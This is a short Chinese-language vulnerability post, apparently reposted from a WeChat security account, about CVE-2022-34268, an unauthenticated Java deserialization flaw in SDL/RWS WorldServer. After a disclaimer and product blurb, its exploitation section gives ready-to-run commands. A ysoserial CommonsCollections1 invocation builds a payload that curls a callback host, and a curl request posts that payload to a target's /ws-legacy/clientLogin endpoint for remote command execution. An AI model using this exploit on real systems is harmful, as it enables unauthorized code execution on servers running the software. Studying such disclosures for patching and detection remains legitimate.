本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
SDL WorldServer 翻译流程管理系统专为本地化项目经理及其团队而设计,用于集中管理、自动化和控制大量的翻译项目,以提供按时、按预算的高质量翻译交付。企业团队可在整个组织内重新获得翻译控制权,并可与多个外部翻译供应商(LSP)高效协作。目前支持许多全球知名品牌的翻译流程,成功简化并加快了其内容从网站到文档到软件的本地化流程。
开发语言:Java官网地址:https://www.rws.com/cn/
空间测绘
回复“CVE-2022-34268”获取空间测绘语句漏洞描述
在 11.7.3 之前的 RWS WorldServer 中发现了一个问题。/clientLogin 在没有身份验证的情况下反序列化 Java 对象,从而导致在主机上执行命令。
影响版本
SDL WorldServer ≤ 11.7.2.243漏洞利用
1.使用ysoserial生成序列化数据
java -jar ysoserial-all.jar CommonsCollections1 "curl 97c2a13451.ipv6.1433.eu.org" > poc.bin2.向目标发送序列化数据
curl --data-binary @poc.bin http://xxx.xxx.xxx/ws-legacy/clientLogin -H "Content-Type: application/x-java-serialized-object"参考链接
https://nvd.nist.gov/vuln/detail/CVE-2022-34268https://www.triskelelabs.com/vulnerabilities-in-rws-worldserver
回复“CVE-2022-34268”获取空间测绘语句
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2OTYzNTExNQ==&mid=2247484668&idx=2&sn=6f00a03442c4c99f1abb8eab7e01bd34&chksm=cfc3a65a078736ff0050ab5f7d1f9ff505b80133bc68e5762ef1d3e57fd916a3857a98a4790e&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh